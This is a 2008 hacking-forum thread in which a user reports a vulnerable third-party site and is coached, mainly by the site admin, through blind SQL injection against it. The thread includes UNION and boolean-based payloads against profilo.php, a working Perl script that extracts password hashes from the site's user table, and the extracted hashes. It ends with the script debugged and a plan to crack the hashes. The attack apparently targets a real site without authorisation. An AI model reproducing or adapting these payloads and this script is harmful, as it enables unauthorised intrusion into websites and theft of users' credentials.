 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Help with SQL injection.. (The used SELECT statements .... ) |
 |
 Posted: Sat Dec 13, 2008 6:17 pm |
 |
|
| ingh1pped |
| Advanced user |
 |
|
| Joined: Dec 13, 2008 |
| Posts: 88 |
|
|
|
 |
|
 |
|
hello and thanks if you can help me.
i found a site vuln, i think.
but when i numbered the columns with order by it's all ok.
just 3 columns
then i try
profilo.php?uid=-1 UNION SELECT null,null,null /*
or
profilo.php?uid=-1 UNION SELECT 1,2,3/*
or with -- or with all select and i have just the same answer :
The used SELECT statements have a different number of columns
if i use from users the answer is
Table '*****.users' doesn't exist
but from utenti is good.
The used SELECT statements have a different number of columns
i found less info for this problem.
its a problem of the structure of the query and the union select statement?^
thanks to all!
 |
|
|
|
|
|
|
|
|
| Posted: Sat Dec 13, 2008 8:50 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Best way is step-by-step approach. First step is getting syntax right.
Use "uid" with valid,working value, for example 523:
| Code: |
profilo.php?uid=523/*
|
No sql syntax errors? Can you see normal page?
Next try blind injections:
| Code: |
profilo.php?uid=523+AND+1=1/*
|
You should see normal page.
| Code: |
profilo.php?uid=523+AND+1=2/*
|
This must be different page, probably partially empty.
| Code: |
profilo.php?uid=523+AND+LENGTH(@@version)>1/*
|
This must be normal page again.
If your test results are as expected, then exploitable sql injection is
confirmed and next step is to try injection with visual feedback. |
|
|
|
|
|
|
|
|
| Posted: Sat Dec 13, 2008 10:35 pm |
|
|
| ingh1pped |
| Advanced user |
|
|
| Joined: Dec 13, 2008 |
| Posts: 88 |
|
|
|
|
|
|
|
great waraxe..
i have made all your passage and i confirm your test
it's positive.
we can try ....
thks, thks, tks..!!!
your are the number one..
i will understand blinded sql...
then
after
profilo.php?uid=523+AND+LENGTH(@@version)>1/*
normal page
how i proceed?
tks waraxe.... try injection together? |
|
|
|
|
|
|
|
|
| Posted: Sat Dec 13, 2008 10:51 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Next try to find valid column count:
| Code: |
profilo.php?uid=-1+UNION+SELECT+1/*
|
| Code: |
profilo.php?uid=-1+UNION+SELECT+1,2/*
|
| Code: |
profilo.php?uid=-1+UNION+SELECT+1,2,3/*
|
Keep incrementing columns count. It can be large number, even >50!
And look for feedback. You can try test strings:
| Code: |
profilo.php?uid=-1+UNION+SELECT+0x74657374,0x74657374,0x74657374/*
|
Look for "test" in response page html source!
And if you get error message, do you see reference to the affected code line? Pay attention to that line number. If it's different for various column numbers, then this means, that sql injection occurs in multiple sql queries and they need different column number ... actually it's pretty common phenomena in real world sql injection exploitings 
Anyway, your goal is to get working feedback! Sql error does not always mean failure, because other sql query can still succeed in case of multiple queries! So ... look for feedback |
|
|
|
|
|
|
|
|
| Posted: Sun Dec 14, 2008 10:33 am |
|
|
| ingh1pped |
| Advanced user |
|
|
| Joined: Dec 13, 2008 |
| Posts: 88 |
|
|
|
|
|
|
|
| Quote: | | Keep incrementing columns count. It can be large number, even >50! |
and this is the problem.. from union select 1 to union select 1, ... 60 the answer is always...
The used SELECT statements have a different number of columns
-----
with this
-1+UNION+SELECT+0x74657374,0x74657374,0x74657374/*
the result is the same...
The used SELECT statements have a different number of columns... from 1-2-3 to >60...
is always a blank page without html source and only that phrase.
The only difference in the page is with precedent tecnique..
profilo.php?uid=523+AND+LENGTH(@@version)>1/*
-------
and obviously.. if i put
profilo.php?uid=-1 order by 1234/*
i obtain
Unknown column '1234' in 'order clause'
but with order by 3/* i obtain a regular page....
then i think there are 3 columns.
trying union select 1,2,3/*
find the message:
The used SELECT statements have a different number of columns
WTF!!
i think it's only eploitable with a blind sql , bruteforcing the ascii value of something.. 
EXAMPLE
profilo.php?uid=1 union select pass,2,3 from utenti/*
Unknown column 'pass' in 'field list'
profilo.php?uid=1 union select password,2,3 from utenti/*
The used SELECT statements have a different number of columns (It' good !! ?? )
profilo.php?uid=1 union select username,2,3 from utenti/*
Unknown column 'username' in 'field list'
profilo.php?uid=1 union select nick,2,3 from utenti/*
The used SELECT statements have a different number of columns (it's good !!??!)
therefore the columns is nick , password, and other i find in the login form like uid.
TKS waraxe for your patience!!!
i hope you give me some genius idea....  |
|
|
|
|
|
|
|
|
| Posted: Sun Dec 14, 2008 11:05 am |
|
|
| maku234 |
| Regular user |
 |
|
| Joined: Jun 03, 2007 |
| Posts: 21 |
| Location: estonia |
|
|
|
|
|
|
| Quote: | but with order by 3/* i obtain a regular page....
then i think there are 3 columns.
trying union select 1,2,3/*
find the message:
The used SELECT statements have a different number of columns |
If you but order by 4/* do you also get regular page ?
And in that case increase the number until you get error. |
|
|
|
|
|
|
|
|
| Posted: Sun Dec 14, 2008 11:19 am |
|
|
| ingh1pped |
| Advanced user |
|
|
| Joined: Dec 13, 2008 |
| Posts: 88 |
|
|
|
|
|
|
|
| Quote: | If you but order by 4/* do you also get regular page ?
And in that case increase the number until you get error. |
no, no.. i know.
if i put 4 i obtain unknow columns 4 ... etc etc like order by 1234/*
then i think there are only 3 columns. But i always obtain these stupid phrase with the select statemente error
i think it 's a problem with the structure of the simple query union. It' s not accepted.. i should try to blind or to make another type of query in the url, but i don't know how, in this moment. I will think. |
|
|
|
|
|
|
|
|
| Posted: Sun Dec 14, 2008 2:47 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Your best choice is probably blind injection. Write your own perl/php/etc script for this (it's my personal favorite approach) or use one of the many sql injection tools, available for download for free
For example take on of my exploits:
http://www.waraxe.us/ftopict-3302.html
This is allready ~75% ready-to-use script for yout goal, just some modifications are needed  |
|
|
|
|
| Posted: Sun Dec 14, 2008 4:12 pm |
|
|
| ingh1pped |
| Advanced user |
|
|
| Joined: Dec 13, 2008 |
| Posts: 88 |
|
|
|
|
|
|
|
fantastic, waraxe... i've just looking some times ago in your portal for tool..
i see again and try to adapt and modify some code...
very, very tks!!
if I win the "battle" i post the beautiful notice and the eventual solution....
see you !!! |
|
|
|
|
|
|
|
|
| Posted: Sun Dec 14, 2008 5:39 pm |
|
|
| ingh1pped |
| Advanced user |
|
|
| Joined: Dec 13, 2008 |
| Posts: 88 |
|
|
|
|
|
|
|
WOW EXPLOIT
i've made a simple blind in perl with my friend athos.
this is the source
| Code: | #!/usr/bin/perl -w
use strict;
use LWP::Simple;
my $a;
my $host = "http://********/profilo.php?uid=";
my @chars = (48..57, 97..102);
for my $i(1..32) {
foreach my $ord(@chars) {
$a = get($host."1+and+ascii(substring((select+password+from+utenti+where+uid=1),$i,1))=$ord--");
if($a !~ /non esiste/i) {
syswrite(STDOUT,chr($ord));
$i++;
}
}
} |
changed the array beacuse i don't know if the password is md5 or not...
and the result is..
******@localhost:~/Desktop$ perl brute.pl
d1ddca4dd71dd6ee444*********
i think that i win loooool
tks to all and expecially to waraxe..
see you later.... bye
|
|
|
|
|
| Posted: Sun Dec 14, 2008 5:41 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Cool |
|
|
|
|
|
|
|
|
| Posted: Sun Dec 14, 2008 7:49 pm |
|
|
| ingh1pped |
| Advanced user |
|
|
| Joined: Dec 13, 2008 |
| Posts: 88 |
|
|
|
|
|
|
|
seems it's no finished... it's an other problem.. 
WTF ?
this is the result---
+++++@localhost:~/Desktop$ perl blindsql.pl
d1ddca4dd71dd6ee444dd331664881bcbcc32ddd4cecee
how is it possible 46 caracthers? why the exploit not stopping it self to 32 ?
This is for the uid=1
For the uid=2
this is the result: 54 caratteri
0ff74efeffb3eee0661363662ddacca047b47b7bb1ff74bb5cecee
i try with uid 3 ? loooooool
however the injection is good
for example
profilo.php?uid=1+and+ascii(substring((select+password+from+utenti+where+uid=1),1,1))=100--
(100 is ascii for the letter "d") is OK, the page is loaded ... otherwise with
profilo.php?uid=1+and+ascii(substring((select+password+from+utenti+where+uid=1),1,1))=101--
(101 is ASCII for the letter "e")
there is an error.
so i think it's a good tecnique.
But how is possible that extract more of 32 chars? probably the pass in the db isn't md5? so i must try other array of chars? other pass lenght? in the exploit?=
How can i modify this script ?
TKS an other time to all and to waraxe.
EDIT
uid 3 8dd788149e49e9ee8dd88cc0267ae267ae67ae7aeaee4cc85cc2bb7ff65bbb 62 chars
???????
uid 4 ? growing 8 chars every uid ? |
|
|
|
|
|
|
|
|
| Posted: Sun Dec 14, 2008 11:53 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
This is why almost any scripts and programs need debugging and tweaking. In specific case there seems to be logic errors in execution flow. Like ...
| Code: |
if($a !~ /non esiste/i) {
syswrite(STDOUT,chr($ord));
$i++;
|
Maybe you need "last" operator after "$i++"? At least from performance point of view, because after valid char for current position is found, there is no need for looking further at same position. And use debug messages, so that you can see visual feedback from script at every step |
|
|
|
|
| Posted: Mon Dec 15, 2008 12:19 am |
|
|
| ingh1pped |
| Advanced user |
|
|
| Joined: Dec 13, 2008 |
| Posts: 88 |
|
|
|
|
|
|
|
great waraxe....
you are the best!!! incredible..
like break in C language.
exactly.. why i didn't think so.. loool
hash is ok..
i probably open a new topic in the right section for hashes that 's no cracked.
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 46
Members: 0
Total: 46
